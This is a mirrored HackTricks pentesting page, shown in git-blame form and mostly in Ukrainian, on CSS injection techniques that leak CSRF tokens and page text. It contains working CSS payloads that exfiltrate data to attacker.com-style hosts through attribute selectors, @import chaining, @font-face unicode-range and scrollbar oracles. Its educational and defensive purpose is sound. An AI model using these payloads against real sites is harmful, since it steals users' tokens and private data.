Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-30 00:20:59 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xs-search/css-injection/README.md

487 lines
36 KiB
Markdown
Raw Normal View History

Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
# CSS Injection
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
<summary>Support HackTricks</summary>
arte
2024-01-01 17:15:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Try Hard Security Group**
a
2024-03-14 23:01:13 +00:00
a
2024-03-26 14:56:40 +00:00
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
a
2024-03-14 23:01:13 +00:00
{% embed url="https://discord.gg/tryhardsecurity" %}
***
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
## CSS Injection
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Attribute Selector
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
CSS селектори створені для відповідності значенням атрибутів `name` та `value` елемента `input`. Якщо атрибут значення елемента введення починається з певного символу, завантажується попередньо визначений зовнішній ресурс:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```css
input[name=csrf][value^=a]{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
background-image: url(https://attacker.com/exfil/a);
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
input[name=csrf][value^=b]{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
background-image: url(https://attacker.com/exfil/b);
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
/* ... */
input[name=csrf][value^=9]{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
background-image: url(https://attacker.com/exfil/9);
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Однак цей підхід стикається з обмеженням при роботі з прихованими елементами введення (`type="hidden"`), оскільки приховані елементи не завантажують фони.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
#### Обхід для прихованих елементів
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Щоб обійти це обмеження, ви можете націлитися на наступний елемент-сibling, використовуючи комбінацію загального sibling `~`. Правило CSS тоді застосовується до всіх sibling, що йдуть після прихованого елемента введення, змушуючи фонове зображення завантажуватися:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```css
input[name=csrf][value^=csrF] ~ * {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
background-image: url(https://attacker.com/exfil/csrF);
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Практичний приклад використання цієї техніки детально описаний у наданому фрагменті коду. Ви можете переглянути його [тут](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e).
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated to Ukranian
2024-03-29 18:49:46 +00:00
#### Передумови для CSS Injection
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Для того щоб техніка CSS Injection була ефективною, повинні бути виконані певні умови:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
1. **Довжина Payload**: Вектор CSS injection повинен підтримувати достатньо довгі payload для розміщення створених селекторів.
2. **Повторна оцінка CSS**: Ви повинні мати можливість оформити сторінку, що необхідно для виклику повторної оцінки CSS з новоствореними payload.
3. **Зовнішні ресурси**: Техніка передбачає можливість використання зовнішньо розміщених зображень. Це може бути обмежено політикою безпеки контенту (CSP) сайту.
GITBOOK-4185: change request with no subject merged in GitBook
2023-12-11 10:10:20 +00:00
Translated to Ukranian
2024-03-29 18:49:46 +00:00
### Сліпий селектор атрибутів
GITBOOK-4185: change request with no subject merged in GitBook
2023-12-11 10:10:20 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Як [**пояснено в цьому пості**](https://portswigger.net/research/blind-css-exfiltration), можливо поєднати селектори **`:has`** і **`:not`** для ідентифікації контенту навіть з сліпих елементів. Це дуже корисно, коли ви не знаєте, що знаходиться всередині веб-сторінки, що завантажує CSS injection.\
Також можливо використовувати ці селектори для витягування інформації з кількох блоків одного типу, як у:
GITBOOK-4185: change request with no subject merged in GitBook
2023-12-11 10:10:20 +00:00
```html
<style>
html:has(input[name^="m"]):not(input[name="mytoken"]) {
Translated to Ukranian
2024-03-29 18:49:46 +00:00
background:url(/m);
GITBOOK-4185: change request with no subject merged in GitBook
2023-12-11 10:10:20 +00:00
}
</style>
<input name=mytoken value=1337>
<input name=myname value=gareth>
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Об'єднуючи це з наступною технікою **@import**, можливо ексфільтрувати багато **інформації за допомогою CSS-ін'єкції з сліпих сторінок з** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
GITBOOK-4185: change request with no subject merged in GitBook
2023-12-11 10:10:20 +00:00
GitBook: [#3288] No subject
2022-06-27 23:34:20 +00:00
### @import
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Попередня техніка має деякі недоліки, перевірте вимоги. Вам потрібно або **надіслати кілька посилань жертві**, або ви повинні мати можливість **вставити в iframe сторінку, вразливу до CSS-ін'єкції**.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Однак є ще одна хитра техніка, яка використовує **CSS `@import`** для покращення якості техніки.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Це вперше показав [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) і це працює так:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Замість того, щоб завантажувати одну й ту ж сторінку знову і знову з десятками різних корисних навантажень щоразу (як у попередньому випадку), ми будемо **завантажувати сторінку лише один раз і лише з імпортом на сервер зловмисника** (це корисне навантаження, яке потрібно надіслати жертві):
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```css
@import url('//attacker.com:5001/start?');
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
1. Імпорт буде **отримувати деякий CSS скрипт** від атакуючих, і **браузер його завантажить**.
2. Перша частина CSS скрипту, яку надішле атакуючий, буде **іншим `@import` на сервер атакуючих знову.**
1. Сервер атакуючих поки не відповість на цей запит, оскільки ми хочемо витікати деякі символи, а потім відповісти на цей імпорт з корисним навантаженням, щоб витікати наступні.
3. Друга і більша частина корисного навантаження буде **корисним навантаженням для витоку селектора атрибутів**
1. Це надішле на сервер атакуючих **перший символ секрету і останній**
4. Як тільки сервер атакуючих отримає **перший і останній символ секрету**, він **відповість на імпорт, запитаний на кроці 2**.
1. Відповідь буде точно такою ж, як **кроки 2, 3 і 4**, але цього разу він спробує **знайти другий символ секрету, а потім передостанній**.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Атакуючий **продовжить цей цикл, поки не зможе повністю витікати секрет**.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Ви можете знайти оригінальний [**код Пепе Віли для експлуатації цього тут**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) або ви можете знайти майже [**той же код, але з коментарями тут**.](./#css-injection)
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
{% hint style="info" %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Скрипт спробує виявити 2 символи щоразу (з початку і з кінця), оскільки селектор атрибутів дозволяє робити такі речі:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```css
/* value^= to match the beggining of the value*/
input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
/* value$= to match the ending of the value*/
input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
```
Translated to Ukranian
2024-03-29 18:49:46 +00:00
Це дозволяє скрипту швидше витікати секрет.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
{% endhint %}
{% hint style="warning" %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Іноді скрипт **неправильно визначає, що префікс + суфікс, що було виявлено, вже є повним флагом** і продовжить рухатися вперед (в префіксі) і назад (в суфіксі), і в якийсь момент він зависне.\
Не хвилюйтеся, просто перевірте **вихідні дані**, тому що **ви можете побачити флаг там**.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
{% endhint %}
Translated to Ukranian
2024-03-29 18:49:46 +00:00
### Інші селектори
GitBook: [#3344] No subject
2022-08-01 23:17:26 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Інші способи доступу до частин DOM за допомогою **CSS селекторів**:
GitBook: [#3344] No subject
2022-08-01 23:17:26 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
* **`.class-to-search:nth-child(2)`**: Це буде шукати другий елемент з класом "class-to-search" в DOM.
* **`:empty`** селектор: Використовується, наприклад, у [**цьому описі**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
GitBook: [#3759] No subject
2023-01-22 23:19:55 +00:00
Translated to Ukranian
2024-03-29 18:49:46 +00:00
```css
[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
```
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Помилковий XS-Search
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Посилання:** [CSS based Attack: Abusing unicode-range of @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Загальна мета полягає в тому, щоб **використовувати власний шрифт з контрольованої точки доступу** і забезпечити, щоб **текст (в даному випадку, 'A') відображався цим шрифтом лише в тому випадку, якщо вказаний ресурс (`favicon.ico`) не може бути завантажений**.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```html
<!DOCTYPE html>
<html>
<head>
Translated to Ukranian
2024-03-29 18:49:46 +00:00
<style>
@font-face{
font-family: poc;
src: url(http://attacker.com/?leak);
unicode-range:U+0041;
}
#poc0{
font-family: 'poc';
}
</style>
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
</head>
<body>
<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
</body>
</html>
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
1. **Використання Користувацького Шрифту**:
- Користувацький шрифт визначається за допомогою правила `@font-face` в `<style>` тегу в секції `<head>`.
- Шрифт називається `poc` і завантажується з зовнішнього кінцевого пункту (`http://attacker.com/?leak`).
- Властивість `unicode-range` встановлена на `U+0041`, націлюючись на конкретний символ Юнікоду 'A'.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
2. **Елемент Object з Резервним Текстом**:
- Створено `<object>` елемент з `id="poc0"` в секції `<body>`. Цей елемент намагається завантажити ресурс з `http://192.168.0.1/favicon.ico`.
- `font-family` для цього елемента встановлено на `'poc'`, як визначено в секції `<style>`.
- Якщо ресурс (`favicon.ico`) не вдається завантажити, резервний контент (літера 'A') всередині тегу `<object>` відображається.
- Резервний контент ('A') буде відображено за допомогою користувацького шрифту `poc`, якщо зовнішній ресурс не може бути завантажено.
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Стилізація Фрагмента Тексту для Прокрутки
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Псевдоклас **`:target`** використовується для вибору елемента, на який націлений **фрагмент URL**, як зазначено в [специфікації CSS Selectors Level 4](https://drafts.csswg.org/selectors-4/#the-target-pseudo). Важливо розуміти, що `::target-text` не відповідає жодним елементам, якщо текст не націлений явно фрагментом.
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Проблема безпеки виникає, коли зловмисники експлуатують функцію **Scroll-to-text** фрагмента, що дозволяє їм підтвердити наявність конкретного тексту на веб-сторінці, завантажуючи ресурс з їхнього сервера через HTML-ін'єкцію. Метод полягає в ін'єкції CSS правила, як це:
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
```css
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
:target::before { content : url(target.png) }
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
У таких сценаріях, якщо текст "Administrator" присутній на сторінці, ресурс `target.png` запитується з сервера, що вказує на наявність тексту. Приклад цієї атаки можна виконати через спеціально підготовлене URL, яке вбудовує ін'єкційний CSS разом з фрагментом Scroll-to-text:
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
```
http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Тут атака маніпулює HTML-ін'єкцією для передачі CSS-коду, націлюючись на конкретний текст "Administrator" через фрагмент Scroll-to-text (`#:~:text=Administrator`). Якщо текст знайдено, вказаний ресурс завантажується, ненавмисно сигналізуючи про свою присутність атакуючому.
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Для пом'якшення слід звернути увагу на такі пункти:
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
1. **Обмежене відповідність STTF**: Фрагмент Scroll-to-text (STTF) призначений для відповідності лише словам або реченням, тим самим обмежуючи його здатність витікати довільні секрети або токени.
2. **Обмеження до верхнього рівня контекстів перегляду**: STTF працює виключно в контекстах верхнього рівня перегляду і не функціонує в iframe, що робить будь-яку спробу експлуатації більш помітною для користувача.
3. **Необхідність активації користувачем**: STTF вимагає жесту активації користувача для роботи, що означає, що експлуатації можливі лише через ініційовану користувачем навігацію. Ця вимога значно зменшує ризик автоматизації атак без взаємодії з користувачем. Проте автор блогу вказує на специфічні умови та обходи (наприклад, соціальна інженерія, взаємодія з поширеними розширеннями браузера), які можуть полегшити автоматизацію атаки.
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Обізнаність про ці механізми та потенційні вразливості є ключовою для підтримки веб-безпеки та захисту від таких експлуатаційних тактик.
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Для отримання додаткової інформації перегляньте оригінальний звіт: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
GitBook: [#3313] No subject
2022-07-10 22:26:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Ви можете перевірити [**експлойт, що використовує цю техніку для CTF тут**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
GITBOOK-4031: change request with no subject merged in GitBook
2023-08-15 01:35:49 +00:00
GitBook: [#3288] No subject
2022-06-27 23:34:20 +00:00
### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Ви можете вказати **зовнішні шрифти для конкретних значень unicode**, які будуть **збиратися лише якщо ці значення unicode присутні** на сторінці. Наприклад:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```html
<style>
@font-face{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-family:poc;
src: url(http://attacker.example.com/?A); /* fetched */
unicode-range:U+0041;
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
@font-face{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-family:poc;
src: url(http://attacker.example.com/?B); /* fetched too */
unicode-range:U+0042;
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
@font-face{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-family:poc;
src: url(http://attacker.example.com/?C); /* not fetched */
unicode-range:U+0043;
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
#sensitive-information{
Translated to Ukranian
2024-03-29 18:49:46 +00:00
font-family:poc;
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
}
</style>
<p id="sensitive-information">AB</p>htm
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Text node exfiltration (I): ligatures <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Reference:** [Викрадення даних у чудовому стилі тобто як використовувати CSS для атак на вебдодатки](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps:
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
1. **Creation of Custom Fonts**:
- SVG fonts are crafted with glyphs having a `horiz-adv-x` attribute, which sets a large width for a glyph representing a two-character sequence.
- Example SVG glyph: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, where "XY" denotes a two-character sequence.
- These fonts are then converted to woff format using fontforge.
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
2. **Detection of Width Changes**:
- CSS is used to ensure that text does not wrap (`white-space: nowrap`) and to customize the scrollbar style.
- The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
- The CSS involved:
Translated to Ukranian
2024-03-29 18:49:46 +00:00
```css
body { white-space: nowrap };
body::-webkit-scrollbar { background: blue; }
body::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
```
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
3. **Exploit Process**:
- **Step 1**: Fonts are created for pairs of characters with substantial width.
- **Step 2**: A scrollbar-based trick is employed to detect when the large width glyph (ligature for a character pair) is rendered, indicating the presence of the character sequence.
- **Step 3**: Upon detecting a ligature, new glyphs representing three-character sequences are generated, incorporating the detected pair and adding a preceding or succeeding character.
- **Step 4**: Detection of the three-character ligature is carried out.
- **Step 5**: The process repeats, progressively revealing the entire text.
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
4. **Optimization**:
- The current initialization method using `<meta refresh=...` is not optimal.
- A more efficient approach could involve the CSS `@import` trick, enhancing the exploit's performance.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
### Text node exfiltration (II): leaking the charset with a default font (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
This trick was released in this [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with\_single\_css\_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
The concept revolves around utilizing an animation to incrementally expand a `div`'s width, allowing one character at a time to transition from the 'suffix' part of the text to the 'prefix' part. This process effectively splits the text into two sections:
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
1. **Prefix**: The initial line.
2. **Suffix**: The subsequent line(s).
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
The transition stages of the characters would appear as follows:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
**C**\
ADB
**CA**\
DB
**CAD**\
B
**CADB**
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
During this transition, the **unicode-range trick** is employed to identify each new character as it joins the prefix. This is achieved by switching the font to Comic Sans, which is notably taller than the default font, consequently triggering a vertical scrollbar. This scrollbar's appearance indirectly reveals the presence of a new character in the prefix.
a
2024-02-05 02:29:11 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Although this method allows the detection of unique characters as they appear, it does not specify which character is repeated, only that a repetition has occurred.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
{% hint style="info" %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Basically, the **unicode-range is used to detect a char**, but as we don't want to load an external font, we need to find another way.\
When the **char** is **found**, it's **given** the pre-installed **Comic Sans font**, which **makes** the char **bigger** and **triggers a scroll bar** which will **leak the found char**.
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
{% endhint %}
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:20:13 +00:00
Check the code extracted from the PoC:
GitBook: [#3087] No subject
2022-04-05 22:03:49 +00:00
```css
/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
